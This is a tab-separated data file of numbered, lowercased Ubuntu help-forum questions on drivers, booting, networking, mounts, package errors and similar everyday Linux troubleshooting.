269439	'client not found in kerberos database ' when joining domain with likewise	i have installed lubuntu and i 'm trying to connect it to my works domain , but i 'm getting an error from likewise - lw_error_krb5kdc_err_c_principal_unknown - client not found it kerberos database at first i thought this could be because linux did not create a computer object in the ou when joining to a domain , so i created on with the name that i was giving the computer and tried again , but i got the same error . i really have no clue why this is happening , so i wonder if any one can give me some pointers ? thanks . here is a screen shot of how i am trying to add the computer , and of the error generated -
269440	configuring irssi to indent a specified amount when wrapping a message	i use irssi-plugin-xmpp with transports to other instant messaging protocols , so jids get pretty long , meaning that messages that get sent to me get squished to the right side of the window . i would like to have irssi indent messages by a fixed amount when wrapping , instead of indenting based on how long the users nick is . how do i do this ?
269442	unable to get bootloader on ubuntu12.04	i have dual boot lenovo laptop g580 . i have already windows 7 and ubuntu 12.04 32-bit installed . i want ubuntu 12.04 64 bit that 's why i tried to reinstall ubuntu 12.04 64 bit in place of 32 bit . after installation i got restart now . then i got : grub rescue > with invalid etl even i am not getting windows boot also . please help me to get bootloader .
269443	twinview nvidia browser spring to left monitor	im using ubuntu 12.4 desktop with nvidia graphic geforce 8400gs . using twinview . since couple of days ago when i double click on top of firefox or chrome to expand in the right monitor . it springs to the left screen . so now it is impossible for me to have firefox expanded in left and chrome at right screen or other way around . they both expand only in left screen . other applications are working fine . i can expand them at right or left screen . i hope somebody can help me with this issue !
269447	how does ubuntu update system work ?	can someone tell me if every major lts update inherits the features from normal ubuntu version ? meaning 12.04.2 inherited features from 12.10 and future 12.04.3 will get the features from 13.04 ? or those features will be implemented into the future 14.04 lts ? i am liking the features of 13.04 and want to know that future 12.04.3 will get the nice features 13.04 version.or i will need to upgrade to 13.04 to enjoy its features .
269449	ubuntu 12.10 broken after first update	just installed 12.10 on an hp elite 3800 desktop with ati video , all worked great ... ( opensuse did n't even want to install ) ..anyway , did the updates then , and now in only boots up in a blank screen , first a purple screen , then it becomes paper like beige background , try to go to a terminal , ( ctrl-f2 etc . ) , results in black screen , also can get back to gui ... i basically can do anything with the pc , nothing to type etc .
269455	drivers for radeon hd 7670 ubuntu 12.04	i have amd radeon hd 7670m graphic card . i want to know if theres any graphic driver present for ubuntu 12.04 lts ? will ubuntu 12.04 support this gpu on my laptop ?
269456	how to change shortcuts in bluefish ?	is it possible to change shortcuts in bluefish ? there is an old guide at http : //bluefish.openoffice.nl/manual/ch08.html , but the information there does n't seem applicable to version 2.0 . modifying menudump in bluefish folder does n't help either . i 'm using version 2.2.4.1 thank you in advance .
269462	diffrence between amd64 and i386 version of ubuntu	can anyone one explain what is the difference between both the versions of ubuntu ? i installed 11.10 i386 and wrote some c code that worked fine in that platform but failed to work in 11.10 amd64 on the same machine . after debugging with valgrind and gdb i got that i was getting segmentation fault in a call to realloc ( ) with an argument mem_ptr and size 0 passed to it . as i searched here i386 is referred to as 32 bit and amd64 as 64 bit . cpu : intel i7 2nd generation
269463	not able to perform wireless connection on ubuntu 12.04	i am having ubuntu 12.04 machine , i was not able to access via wireless network connection . now , the machine is connected via wired connection . please share me the details how to turn ubuntu 12.04 in to wireless connecting device
269464	getting configure command of php	i am using an ubutnu os , i have installed lamp stack using `` tasksel '' , i am not able to find the `` configure command '' while i am going through phpinfo . but , in the same os i am able to see the `` configure command '' only if i am compiling the php from source . is anyone can explain how the tasksel hiding their `` configure command '' and how to find their `` configure command '' . with regards dipu r i have installed two lamp stack in two different machine runs on ubuntu . one lamp is installed using `` tasksel '' ( an installer ) other one i installed from source . i have created a page in lamp ( created using task ) i have created page in both lamp and called phpinfo ( ) ( this functions lists information about installed php ) . in the lamp ( installed from source ) , showing `` configure command '' entry in phpinfo table , but in the same time `` configure command '' is missing ( or not displaying ) in the other lamp ( installed using tasksel ) . i wish to know how the `` tasksel '' hiding the `` configure command '' , also wish to know is there any chance to view it .
269465	installing ubuntu and replacing windows	how can i install ubuntu and replace windows without a flash drive or burning a cd ? can i use an external hard drive ? if so , what would be the procedure ? thanks .
269466	can i force window to open on top of other windows when opened by keyboard shortcut ?	i use spacefm as my primary file manager on ubuntu . i typically open folder directly by keyboard shortcuts , so , e.g . ctrl+super+w opens my work folder . specifically , i use execute the command spacefm -w /home/rasmus/work/ by the above shortcut , with the -w ensuring that spacefm opens a new window . however , this new window is not always open on top of the last active window on the workspace . this is rather annoying , as it means i sometimes have to `` dig '' for the newly opened window . so , my question is : is there something additional i can add to the executed command that will ensure that the fresh window is opened on top ? alternative solutions to the same effect are welcome .
269469	upgrade by restoring back up	i am upgrading my ubuntu 12.04 to 12.10 , and my question is , after upgrading ubuntu , if i make back up of 12.10 then install 12.04 again and then if i restore the backup , will 12.04 upgrade to 12.10 ? please answer immediately , thanks
269472	why is ubuntu shipped with firefox ?	i 'm just curious , and some of my friends too . personally i think `` chromium-browser '' is better ( faster , less crashing ) than `` firefox '' , and , why ubuntu not shipped with more than 1 web browser ?
269475	admin to root privileges	i 'm trying to put up a cs : s ( srcds ) server , but when i use the given instructions , the terminal says that i do n't have the permission to change it . my account is an admin account right now . can i give it the same privileges as root login ? i want to go around the root login , and only use my admin account .
269479	why does sudo cd occasionally return command not found	when exploring my disk drive contents i noticed that from / cd root failed as did sudo cd root ; the only way i was able to view the contents was sudo su , then cd root pete $ pwd / pete $ cd root bash : cd : root : permission denied pete $ sudo cd root sudo : cd : command not found pete $ sudo su root @ pfeiffep-inspiron-6000 : / # cd root root @ pfeiffep-inspiron-6000 : ~ # pwd /root i 'm just curious since i found the method !
269480	why does ls -l output a different size from ls -s ?	i ca n't figure out why i 'm getting the following results : ls -l tells me the size of a given file ( history ) is `` 581944 '' : $ ls -l history -rw-rw-r -- 1 waldir waldir 581944 feb 22 10:59 history ls -s says it is `` 572 '' : $ ls -s history 572 history i obviously need to make the values use a comparable scale . so first i confirm that using -- block-size 1 in ls -l gives me the same result as before : $ ls -l -- block-size 1 history -rw-rw-r -- 1 waldir waldir 581944 feb 22 10:59 history then i do the same to ls -s to get a value in the same scale : $ ls -s -- block-size 1 history 585728 history different results ! 581944 ≠ 585728 . i tried generating comparable values the other way around , using -k , but i get : $ ls -lk history -rw-rw-r -- 1 waldir waldir 569 feb 22 10:59 history $ ls -sk history 572 history again , different results , 569 ≠ 572 . i tried specifying -- si to make sure both options were using the same scale , to no avail : $ ls -lk -- si history -rw-rw-r -- 1 waldir waldir 582k feb 22 10:59 history $ ls -sk -- si history 586k history ... again , different values : 582k ≠ 586k . i tried searching the web but the only thing i could find that seemed relevant was this : some files have `` holes '' in them , so that the usage listed by ls -s ( ... ) is less than the file size listed by ls -l. '' ( note that in my results the opposite happens : ls -s returns sizes bigger than ls -l , not smaller . ) meanwhile , this page says that there is no elegant way to detect unix file holes . so , how can i deal with this discrepancy ? which of these values can be considered correct ? could this possibly be a bug in ls ?
269485	how can i prevent my laptop auto suspend ( due to critically low battery ) from looping ?	i have an acer aspire 5750g on ubuntu 12.04lts and i 've got a problem : battery critically low > suspend > wake up instantly ( i do n't touch anything ) > suspend > wake up ... . power outage > dead . i 've posted a syslog on pastebin of the pc doing this crazy thing http : //paste.ubuntu.com/5625069/
269491	can not get correct privileges using samba on nfs mounted partition	i have read/scanned for samba/nfs problems and answers on the forum , which were quite interesting , many thanks for those : ) setting up nfs can be quite a pain in the ... but getting a warning before the problems arise is really a nice thing to have . my problem : i installed two pc 's with ubuntu/kubuntu , both as server , but need some help getting things right . ubuntu is working fine , on both machines ( called p and n ) , and i installed samba on machine p to make an easy interface with all the windows machines in the office , and installed nfs client on the same machine p. the other machine n is setup with nfs server . everything is working fine , windows shows the samba user home directory , logs in fine on machine p , and the nfs mount is also visible , and when i use a linux shell to login on a linux account , i can see the nfs mounted directory , and i am able to write to it ( create new files ) . what is working : a samba user can read files on the nfs mount , and can even rename files on it . what is not working : a samba user can not create a new file . i synchronized the guid/uid on both machines as to not fall into the nfs users pitfall , so that can not be the problem . at this moment i do n't have that many users installed , so it 's easy to keep track . it might well be that my problem is version related : machine p runs 12.04 ubuntu , machine n runs 12.10 ( kubuntu ) . and i am using putty to get a shell
269499	script to run sets of commands	i would like to run fdisk and automatically do a particular command , like p ( print ) installation.sh : fdisk /dev/sdc1 i do n't know how to give the process input to the programm .
269502	high number of ethernet errors . tool for testing the ethernet card ?	i have an asus sabertooth x79 . i often get corrupted files . i checked the ram , but memtest finds no errors . to avoid the possibility of disk errors , i tried copying the files to tmpfs . if i copy from the network , i get md5sum mismatches about once every 10 times using a 6gb file . copying from ram to ram , i did n't get mismatches . i get a very high number of errors in ifconfig ( compared to others pcs i just took as reference , which have 0 with much more traffic ) . here is an example rx packets:13972848 errors:200 dropped:0 overruns:0 frame:101 the motherboard is new , but do you think there 're some problems with it ? what could i use to test the ( integrated ) network adapter ? what else do you think i should double check ? -- edit -- i tried another nic , it gives a lot of corrupted mac on input . disconnecting : packet corrupt lost connection . i noticed that another pc downloads at 11.1mb/s without problems . this pc at 66.0 mb/s . is there any way to try to limit the speed ?
269503	latest nvidia driver from nvidia quadro 2000 working only on dvi analog pins	i just re-installed my dell precision workstation t3500 with ubuntu 12.04 lts , installed the latest nvidia drivers available from ubuntu , and the card will now output only via the analog pins of the dvi port . i can only use it via an adapter to a vga cable . dvi - dvi does n't work , and display port - dvi does n't work . this all worked via the previous version of the driver . anybody else having this issue ?
269504	not able to browse internet through wifi , but working fine with ethernet card	hi i think i can get help from this page ... i am using ubuntu 12.10 , i am able to access internet through lan wire , my laptop is also able to search my home router ( wifi ) and is also properly connected and shown as `` connected '' . but i am not able to access internet through wlan . eth0 link encap : ethernet hwaddr 00:23:8b:08:6b:33 inet addr:192.168.0.100 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :223:8bff : fe08:6b33/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:1546 errors:0 dropped:0 overruns:0 frame:0 tx packets:479 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:210353 ( 210.3 kb ) tx bytes:42731 ( 42.7 kb ) interrupt:17 eth1 link encap : ethernet hwaddr 00:21:00 : c9 : e3 : df inet addr:192.168.0.103 bcast:192.168.0.255 mask:255.255.255.0 inet6 addr : fe80 : :221 : ff : fec9 : e3df/64 scope : link up broadcast running multicast mtu:1500 metric:1 rx packets:4237 errors:5 dropped:0 overruns:0 frame:124699 tx packets:4213 errors:13 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 rx bytes:4447180 ( 4.4 mb ) tx bytes:575316 ( 575.3 kb ) interrupt:19 lo link encap : local loopback inet addr:127.0.0.1 mask:255.0.0.0 inet6 addr : : :1/128 scope : host up loopback running mtu:16436 metric:1 rx packets:59 errors:0 dropped:0 overruns:0 frame:0 tx packets:59 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:0 rx bytes:4500 ( 4.5 kb ) tx bytes:4500 ( 4.5 kb ) plz help
269505	realtek rtl8723e wireless card will not connect	i 'm having a problem with the realtek rtl8723e like so many others , but in my case it simply refuses to connect . i am running ubuntu 12.10 with the latest patches and kernel . i referred to this excellent thread : wireless card realtek rtl8723ae-bt is not recognized to try to install the realtek wireless card on a new laptop - the zoostorm w251eu . i have tried everything in the thread but the network manager simply shows 'wireless networks ' greyed out and disconnected . oddly enough this worked before on kernel 3.5.0-25 ... but after a reboot yesterday stopped working and has not worked since . hardware switch - works , and it is on sudo lshw -c network output *-network description : wireless interface product : realtek semiconductor co. , ltd. vendor : realtek semiconductor co. , ltd. physical id : 0 bus info : pci @ 0000:02:00.0 logical name : wlan0 version : 00 serial : 20:68:9d : dc : fe:25 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rtl8723e driverversion=3.5.0-26-generic firmware=n/a latency=0 link=no multicast=yes wireless=ieee 802.11bgn resources : irq:18 ioport : e000 ( size=256 ) memory : f7d00000-f7d03fff rfkill list shows no hardware or software blocks my blacklist is empty driver : rtl_92ce_92se_92de_8723ae_linux_mac80211_0007.0809.2012 appears to make and install fine , but does not work any more . this worked previously with the 0-25 kernel ( the problem appeared before the kernel upgrade to 0-26 , i redid all the steps after installing kernel 0-26 in the hope it would start working again ) i 'm running windows 7 x64 inside virtualbox , have tried to play with the network settings just in case there 's some interference . no joy .
269509	gi.repository/python3 example for indicate ?	is there a gi.repository ( and python 3 ) example for indicate ? i am having trouble following the example at ubuntu app developer . specifically if i do : from gi.repository import indicate mm = indicate.indicate_server_ref_default ( ) i get : attributeerror : 'gi.repository.indicate ' object has no attribute 'indicate_server_ref_default' not sure if i 'm missing a library ( i 'm on ubuntu 12.04 but will move to 13.04 when released ) or getting the api wrong ... or both ! not having a python api is frustrating - i assume this is because the python library front-end dynamically calls underlying c ? is there a way to generate the python api documentation ?
269510	ttys are not working with ppa nvidia-current driver on 12.04	mar 18 i bought a new dell 660s for learning linux ! it is intel i3 , 4 gb , 500gb hd , 23 '' dell led display and a nvidia gt 620 video card . i chose ubuntu 12.04 lts amd64 . it is freshly installed . i added a ppa source ( see https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates ) and installed the package nvidia-current and then rebooted . the video card works on 1024x768 , instead of native 1920x1080 . only resolutions of 1024x768 and 800x600 can be chosen in the system settings . even worse , when i ctrl+alt+f1 to f6 , all the ttys are blank . in fact , i tryed many times and read many texts online . all i can do now is to try to ask here for help . mar 19 i changed driver from ppa : ubuntu-x-swat/x-updates to ppa : xorg-edgers/ppa ( see https : //launchpad.net/~xorg-edgers/+archive/ppa ) . and installed the post-release one . now desktop display resolution is better . and now , i press ctrl+alt+f1 to f6 , the screen is not that blank but changed to a black screen with only a blinking prompt as '_ ' . the tty is not working still .
269512	how to prevent non-root user from changing ip address and network parameters ?	as i wrote in subject - how to prevent non-root user from changing ip address and network parameters ? it 's on ubuntu 12.04 . i followed instructions on sitepoint 's link http : //www.sitepoint.com/ubuntu-12-04-lts-precise-pangolin-networking-tips-and-tricks/ , in disable the network manager and âhard-codeâ a static ip address section , but that does not works - end user is still capable to change network parameters . can you help me please how to solve my problem ?
269514	how to type in kannada language in libreoffice ?	in previous releases , the following packages were supported : scim scim-bridge-agent scim-bridge-client-gtk scim-bridge-client-qt4 scim-m17n scim-modules-table however , they are not available in quantal 's repositories from 2012-09-24 . how do we use ibus instead ?
269515	ubunut 12.10 64 bit using 100 % cpu	configuration ubuntu 12.10 ( 64 bit ) i3 processor ruby 1.9.3 java openjdk ( 6 or 7 ) any ruby or java command using 100 % cpu . it works perfectly fine with ubuntu 10 or 11 ( 32 bit ) .
269520	grub2 on hard drive chainload grub2 on usb	i 'm taking steps to secure my laptop - from both a data security and physical security point of view . i currently have full disk encryption with luks set up through the installer - this is pretty much a vanilla configuration as per installer defaults , with an unencrypted boot partition that asks me to unlock the disk . in the case of my laptop being stolen , i do n't have anything set up at the moment that would help me/the police recover it . for this reason , i want to configure a honey-trap that will allow the laptop to run prey if a thief boots the laptop . to do this , i want to move the standard grub , kernel and inital ramdisk onto a usb stick that i 'll keep with me at all times . i 'll install a copy of tiny core linux ( or dare i say - windows ) on my laptop which will only boot when i do n't plug in my usb stick . to stop a potential thief from wiping the hard drive , i 'm going to apply a bios password and disable booting from external devices . obviously this would n't stop them removing the hdd and wiping it , but it 's a step against a low-level thief . if i do this , i wo n't be able to boot from my usb - so i 'll need a way to chainload grub on my usb from grub on my hard drive . is this possible - if so , how can i do this/where can i find suitable documentation ? everywhere i 've looked suggests using plop , lilo or some other software , when i 'm sure this should be possible from grub alone . similarly , i could use uefi secure boot to restrict booting onto only my honey trap and `` true '' kernels and initial ramdisks , but my laptop is n't uefi-compatible : ( similarly this could be an x/y problem , so if you think i 'm going about this the wrong way , feel free to suggest changes .
269521	ubuntu on oracle vm virtualbox running slowly	so i am super new , not only to ubuntu , but also to virtualbox . i have linux/unix experience , though i would not call it particularly strong experience . i have recently installed ubuntu using virtualbox on my windows 8 home machine . i used all of the default download settings . it unfortunately runs supppper slowly . while trying to figure out my problem , i am reading a lot of similar posts that offer that the problem is a game engine called unity 2d/unity 3d , but most of the time , when someone mentions that it is the cause of the problem the person asking the question says `` of course , good answer . '' which is n't particularly helpful to me , as a new user . otherwise i have read that it could be my graphics card , vga driver , memory allocation or something to do with guest admissions and unity . i really have no clue which of these could actually be causing me trouble so i was hoping someone could walk me through common problem solving tasks . i installed ubuntu through virtualbox . base memory 512 mb , video memory 12 mb . my computer : surface pro 4 gb of installed mem , 64 bit operating . note : changing base mem to 1000mb did not allow for much faster speeds . can anyone guide me through some steps to solve this matter ?
269527	remove osx partition	i triple boot osx , windows 8 , and ubuntu on an imac . i rarely use the osx and only boot into windows to play some video games on occasion . my question is what is the process for removing osx and giving the free space to ubuntu with out wrecking my boot up ? i should also mention that i have refit installed on the osx side so i 'm not sure how that would work with osx gone..
269530	latex , kile ide , ubuntu 12.10	i have been using latex for a while on windows but i just converted my windows machine to ubuntu only now . unfortunately , i have never used kile before . i have downloaded texlive 2012 and kile . how do i open the kile ide with ubuntu ?
269534	can i install ubuntu on g4 mac ?	i will be getting a mac g4 laptop , will post the exact specs when i get it , and i was wondering if it would be safe to install ubuntu alongside osx ( probably tiger ) and would the hardware ( graphics , sound , hdd size ) be enough ?
269535	how to open firefox with proxy settings via terminal ?	hi , i want to open firefox from the terminal with socks proxy setting enabled . i would like to define it in terminal while opening . can this be done ? and obviously if it can does anyone know how ? cant find info on this anywhere thanks
269539	how to enable concurrency in grub2 ?	while reading about speeding up linux , particularly the boot process i found that concurrency is suggested for multiple core pc 's . it appears that this setting was easily achieved in legacy grub , however i could not discover how to achieve this in grub2 . my system : grub customizer ver 3.0.4 ubuntu 12.10 session fall back 3.5.0-24-generic hp desktop with intel icore 7 3.2ghz 12 gb ram 1 tb hdd
269541	how do i install ubuntu on ssd cache and maintain windows acceleration ?	i hope this is the right place to ask this question . i just bought a lenovo u310 preinstalled with windows 7 . it has a 32 gb ssd cache drive and a 500 gb hard drive . i want to install ubuntu root directory on about 10gb of the ssd and install the home directory on the hard drive . furthermore , i want to leave the rest of the ssd space as it was intended , to accelerate windows 7 . is this possible ? how can i do it .
269543	how to turn off libnotify notifications only when sound is in muted state ?	i have a multimedia keyboard that allows me to easily mute the sound ( ubuntu 12.04 ) . it would be nice to `` link '' this to also turn off libnotify messages that pop-up in the top right corner ( i.e . pidgin messages ) . so when ubuntu is muted , no libnotify messages would pop up . when not muted , messages show as normal . is this possible with a script of some kind or would it require changing source code ?
269546	multi-touch for xps-15	i realise there are hundreds of other threads just like this . but all solutions seem to be out of date or are just not specific to my machine . i used a mac-book pro for the first time , i hated everything about it , except for the gestures . so i am looking to get those on my computer . now my computer is basically like a clone of the mac-book pro , i have the best dell xps 15 i could get . it supports multi-touch , and i am hoping to get gestures . i couldnât figure out touch egg because some commands simply did n't work for me . so i am looking for some assistance . easy stroke or whatever did not work . so touch-egg seems to be what i am looking for . i am running ubuntu 12.10 , but may upgrade to 13.04 in the future . any suggestions ?
269552	taking screenshots with mac keyboard	i have been using ubuntu 10.04 on my hp notebook for more than two years , and i have just installed ubuntu 12.04 on mac pro . the problem of taking screenshots on a mac is that there is no printscreen key . so how can i take screenshots ?
269553	indicator-cpufreq	i 'm using 12.04.2 lts and i had problems with overheating ( lenovo t500 ) . so after i installed indicator-cpufreq my temp is ok . but the problem is when i restart the computer it get back on ( performance ) in begining and after few minutes on ( ondemand ) . i would prefer to keep it all the time on powersafe . so is there any option ( any file to edit ) to put my indicator-cpufreq to powersave permanently . thanks for your help ! f
269557	get apt-get stop using ipv6	i 'm trying to use apt-get update or any other apt-get command it gives me this error : hiba történt „2001 : db8 : dbb:1:1:1:1:221:8049” feloldásakor ( -9 - a címcsalád a gépnévhez nem támogatott ) ( google translate ) there was an error `` 2001 : db8 : dbb : 1:1:1:1:221:8049 '' resolving ( -9 - address family for hostname not supported ) which is strange because there is no ipv6 anymore for that machine . there was before , but a router was removed which give it to it , and i removed the ipv6 association from the network configuration via gui . did i miss something ?
269568	the system is running in low graphics mode	i am using ubuntu 12.1 and this morning when i started my computer i received the above message . from what i understand this is not an uncommon issue , and i attempted to fix it using several of the methods advised here : how to fix `` the system is running in low-graphics mode '' error ? . unfortunately none of them worked for me . pressing ctrl+alt+f1 at the error screen does not give me any result , and i 'm unsure how and if i can get access to the terminal . i have also tried opening it with the grub menu option ubuntu , with linux 3.5.0-25 generic ( recovery mode ) and 3.5.0-17 generic ( recovery mode ) . either way when i attempt to open failsafex i get a screen which says ( this is translated from spanish so it may not be 100 percent accurate ) continue will remount your archive system in reading/writing mode and mount whichever other archive system is defined in /etc/fstab . do you want to continue ? when i hit enter on yes a black bar opens at the bottom of the screen with the lines fsck de util-linux 2.20.1 and below that /dev/sdal : clean , 187630/30277632 files , 5973800/121082880 blocks . below that it gives me options to type . i have tried entering commands there as advised in the link above but never get any response and eventually have to force a restart . does anyone have any idea what i can do ? it seems like if i could get access to a terminal then this would be relatively straightforward , but i do n't know how .
269573	why do i get `` items can not be installed or removed until package catalog is repaired '' ?	i 'm new to ubuntu . iâm unable to install anything on the ubuntu software centre . it just keeps giving me items can not be installed or removed until package catalog is repaired . if i click on repair it just gives me : package operation failed installarchives ( ) failed : ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 174380 files and directories currently installed . ) unpacking libjpeg8 : amd64 ( from ... /libjpeg8_8d-1_amd64.deb ) ... dpkg : error processing /var/cache/apt/archives/libjpeg8_8d-1_amd64.deb ( -- unpack ) : trying to overwrite '/usr/lib/x86_64-linux-gnu/libjpeg.so.8 ' , which is also in package libjpeg-turbo8 : amd64 1.2.1-0ubuntu2 configured to not write apport reports errors were encountered while processing : /var/cache/apt/archives/libjpeg8_8d-1_amd64.deb error in function : dpkg : dependency problems prevent configuration of printer-driver-hpijs : printer-driver-hpijs depends on libjpeg8 ( > = 8c ) ; however : package libjpeg8 : amd64 is not installed . dpkg : error processing printer-driver-hpijs ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of printer-driver-hpcups : printer-driver-hpcups depends on libjpeg8 ( > = 8c ) ; however : package libjpeg8 : amd64 is not installed . dpkg : error processing printer-driver-hpcups ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of hplip : hplip depends on printer-driver-hpcups ( = 3.12.6-3.1 ) ; however : package printer-driver-hpcups is not configured yet . dpkg : error processing hplip ( -- configure ) : dependency problems - leaving unconfigured
269574	wmctrl - focus most recent window of an app	i 've created some shortcuts mimicking the unity 's mod4 + num behavior . wmctrl -xa sublime || subl what i do n't like , is that once sublime is running , it always focuses the first opened window . i 'd like to focus the last `` focused '' window . same as in unity . is there a flag for that ?
269577	how can i restore the swap drive used by ubuntu , back to windows 7 ?	i just installed ubuntu 12.10 on my laptop ( which has windows 7 ) but i used my second data drive as a swap for ubuntu . how can i restore this swap drive back so it can be accessed by windows 7 again ? ( everything else works normally as a dual boot system there is no problem ) .
269585	how to rename an application so as to affect alphabetical order of right-click `` open with '' applications list ?	i 've recently switched my default pdf viewer from acroread to qpdfview ; for ( serious , duplex-multipage ) printing , though , i still prefer evince ( to both acroread and qpdfview ) . to quickly open a pdf with evince , i used to be able to open the context-menu ( by right-clicking , shift f10 or the context-menu button ) , followed by h for `` open wit_h_ '' and finally enter , to open evince , which then was the first entry in the applications list . now , however , acroread leads the alphabetical list ; hence , i need to use the down or up key ( s ) to select evince before hitting enter . i 'd like to rename acroread ( whilst keeping it in that very list ) to , say , z_acroread , so evince would come up as the first entry again .
269587	will ubuntu 12.10 or 12.04 run very smoothly on my computer or should i go with lubuntu ?	i have a somewhat old computer with mid-range hardware . here 's what my computer has : 1.8 ghz willamette pentium 4 256 kb l2 cache nvidia geforce 6200 le 256 mb ddr2 1024 mb ddr at 133 mhz 40 gb hd 5400 rpm before , i used fedora 17 with my computer , and installation was somewhat long , about 25 % ( all night installation ) longer than windows xp ( which took 2 hours ) . it ran at an ok speed , but it was slow and constantly lagged in all areas . this included starting libreoffice in fedora 17 , loading the applications screen , scrolling down the applications screen , and even when switching a wallpaper and it took more than 15 seconds just for mozilla firefox to start up , so i eventually switched back to windows xp in frustration with disappointment at the speed of fedora 17 . however , i 've gotten tired of xp and i want to go back to linux . i 'm looking at the ubuntu 12.10 & 12.04 requirements which demand 512 mb of ram and a 1.0 ghz pentium 4 processor , but i 'm not sure if i should install ubuntu , or try going with another desktop environment such as lubuntu , which i 've been looking into . with my previous experience with fedora 17 , i 'm not sure whether or not my computer will run very smoothly using ubuntu 12.04 or 12.10 . as a result , i 'm kind of stuck between lubuntu and ubuntu ...
269588	how do i get the ip address of an lxc container ?	i 've written a few scripts to manage lxc containers , and i can get their ip addresses via ifconfig , assuming i 'm connected to the console . i now want to connect to these containers via ssh . how do i get their ip address in such a way that i can write a script ? i also do n't want to set the addresses manually ( but i 'll do it , if that 's the only option ) . so far , i 've tried using lxc-start , but the machine does n't have an ip address before i run /sbin/init .
269591	cifs shares not mounting ( permission denied ) lubuntu 12.10 via /etc/fstab	before i upgraded to 12.10 , i was able to mount my shares automatically . they 're located on an amahi home server running fedora 14 . i 'm able to access them without any problems via pacmanfm ( i 'm using lubuntu ) , but when i try to mount them permanently via /etc/fstab , i get mount error ( 13 ) : permission denied refer to the mount.cifs ( 8 ) manual page ( e.g . man mount.cifs ) my lines in /etc/fstab look like this ( there 's four shares that i 'm mounting ) # adding networked drives 3-18-13 //hda/music /home/patrickdickey/music cifs credentials=/home/patrickdickey/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 //hda/movies /home/patrickdickey/videos cifs credentials=/home/patrickdickey/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 //hda/patrickdickey /home/patrickdickey/myhda cifs credentials=/home/patrickdickey/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 //hda/docs /home/patrickdickey/docshda cifs credentials=/home/patrickdickey/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 //hda/books /home/patrickdickey/books cifs credentials=/home/patrickdickey/.smbcredentials , iocharset=utf8 , file_mode=0777 , dir_mode=0777 0 0 which is pretty much straight out of the community help page for mounting a windows share permanently . i checked dmesg | tail ( and /var/log/kern.log ) and got these responses [ 52.680033 ] fs-cache : loaded [ 52.764054 ] fs-cache : netfs 'cifs ' registered for caching [ 52.764242 ] key type cifs.spnego registered [ 52.764262 ] key type cifs.idmap registered [ 52.765794 ] cifs : no cache= option specified , using `` cache=loose '' . this default will change to `` cache=strict '' in 3.7 . [ 52.912035 ] cifs vfs : default security mechanism requested . the default security mechanism will be upgraded from ntlm to ntlmv2 in kernel release 3.3 [ 54.107070 ] cifs vfs : cifs_mount failed w/return code = -13 [ 54.120041 ] cifs vfs : cifs_mount failed w/return code = -13 [ 54.121778 ] cifs vfs : cifs_mount failed w/return code = -13 [ 54.135672 ] cifs vfs : cifs_mount failed w/return code = -13 [ 54.138654 ] cifs vfs : cifs_mount failed w/return code = -13 i 'm at a loss . my .smbcredentials file shows username=myusername password=mypassword and i 've tried adding domain=dickey which is the name of the workgroup that it 's assigned to . but nothing works . i 'm able to mount them manually , if i use sudo mount -t cifs //hda/movies /home/patrickdickey/videos -o username=patrickdickey , password=mypassword , uid=1000 , gid=1000 but , if i change the username= , password= to credentials= and use my .smbcredentials file , i get the permission denied error . i think the problem is that my password begins with a : , but i 'm not sure how to fix that in the credentials file ( especially since it works when i put it in manually ) . in fact , i 'm pretty sure this is the problem , as changing the lines in /etc/fstab to username=patrickdickey , password=mypassword works fine ( with sudo mount -a ) . so , i guess my main question is , how to i pass the : in my password via the credentials file ? ( for reference , let 's say my password is : dogwalk3r -- which it 's not even close to ) . any help with this is greatly appreciated . have a great day . : ) patrick .
269606	apt-get count the number of updates available	currently i use this to count the number of available updates numofupdates= $ ( aptitude search `` ~u '' | wc -l ) is there a way to do the same with apt ( not aptitude ) but not using the update-notifier ?
269608	updating tomtom gps map ( without a virtual box / wine solution )	i have a tomtom via 130 gps and would like to update my map . on their website they ask to install a software , but ubuntu is not supported ( neither other linux distributions ) . quite amazing for a device developed on a linux kernel . is there a way to do it without a virtual box ? i do n't consider the virtual box option because my system is very light . and this is another question .
269612	shrink root partition and allocate free space to home partition	while installing ubuntu i did the partition and allocate disk space like that 4 gb for home 1 gb for linux-swap 95 gb for root but sooner i realilized that my /home partition is almoast occupied all space in home folder . now i want to resize my /home partition . now i want to shrink my root partition and allocate the free space to my home partition . how can i do it ?
269613	terminal quickstarter guide ?	i 'm very new to ubuntu , and any other os than windows . anyway , i was just thinking , is there a `` terminal quick-starter guide '' or something like that ? because i really want to learn the terminal , because i realize it is quite useful . i was thinking to use it mostly for browsing the directory and stuff like that , but i also just want to learn the basics . thanks in advance !
